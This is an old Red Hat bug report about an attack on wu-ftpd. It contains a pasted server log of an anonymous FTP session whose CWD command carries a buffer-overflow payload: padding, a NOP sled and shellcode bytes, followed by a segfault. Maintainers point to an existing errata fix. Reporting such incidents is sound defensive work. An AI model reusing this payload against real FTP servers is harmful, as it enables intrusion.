Bug 66171 - Security hole in FTPD
Summary: Security hole in FTPD
Keywords:
Status: CLOSED ERRATA
Alias: None
Product: Red Hat Linux
Classification: Retired
Component: anonftp
Version: 6.2
Hardware: All
OS: Linux
medium
medium
Target Milestone: ---
Assignee: wdovlrrw
QA Contact: David Lawrence
URL:
Whiteboard:
Depends On:
Blocks:
TreeView+ depends on / blocked
 
Reported: 2002-06-05 19:07 UTC by Need Real Name
Modified: 2007-04-18 16:42 UTC (History)
0 users

Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Clone Of:
Environment:
Last Closed: 2002-06-05 19:40:57 UTC
Embargoed:


Attachments (Terms of Use)

Description Need Real Name 2002-06-05 19:07:03 UTC
From Bugzilla Helper:
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Q312461)

Description of problem:
Attached is a fragment of the log file a few times left by some hacker in my PC.


Version-Release number of selected component (if applicable):


How reproducible:
Always

Steps to Reproduce:
See "Additional Info"


Actual Results:  The hacker gains access to ~ftp directory.  Thanks god 
it's "chroot"ed.

Expected Results:  FTPD should not be crashed that easly.


Additional info:

Jun  4 22:51:34 hypres ftpd[714]: USER ftp
Jun  4 22:51:34 hypres ftpd[714]: PASS mozilla@
Jun  4 22:51:34 hypres ftpd[714]: ANONYMOUS FTP LOGIN FROM a-na25-23.tin.it 
[212.216.205.22], mozilla@
Jun  4 22:51:35 hypres ftpd[714]: RNFR ././
Jun  4 22:51:59 hypres last message repeated 72 times
Jun  4 22:51:59 hypres ftpd[714]: PWD
Jun  4 22:51:59 hypres ftpd[714]: CWD 
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000PP*P*P*P-
P*P*P*,^E^G^H^X5^H^HP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^L
P^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^L
P^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^L
P^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^L
P^LP^LP^LP^LP^LP^LP^LP^L\220\220\220\220\220\220\220\220\220\220\220
\2201QCT^KtQ^K-
^A^A^A^AP\211Pj^DX\211P1P<\200P^N1QPP&P'P9Yj^CXP<\200P^EP%PP*P*P*
Jun  4 22:52:00 hypres ftpd[714]: CWD /pub/.
Jun  4 22:52:00 hypres ftpd[714]: CWD .
Jun  4 22:52:01 hypres ftpd[714]: RNFR ././././././././.
Jun  4 22:52:01 hypres ftpd[714]: CWD 735073
Jun  4 22:52:01 hypres ftpd[714]: CWD 73507
Jun  4 22:52:02 hypres ftpd[714]: CWD 7350P
Jun  4 22:52:02 hypres ftpd[714]: RNFR .
Jun  4 22:52:02 hypres ftpd[714]: RNFR ./././././././.
Jun  4 22:52:02 hypres ftpd[714]: exiting on signal 11: Segmentation fault
Jun  4 22:52:02 hypres inetd[848]: pid 714: exit status 1

Comment 1 Bernhard Rosenkraenzer 2002-06-05 19:10:01 UTC
Did you install all errata packages? This looks a lot like a problem we fixed
some months ago.

Comment 2 Need Real Name 2002-06-05 19:40:51 UTC
Oh, right you are.  I did download the patch for wu-ftpd, but forgot to upgrate 
it.  My falt, - sorry.  Thanks a lot!



Note You need to log in before you can comment on or make changes to this bug.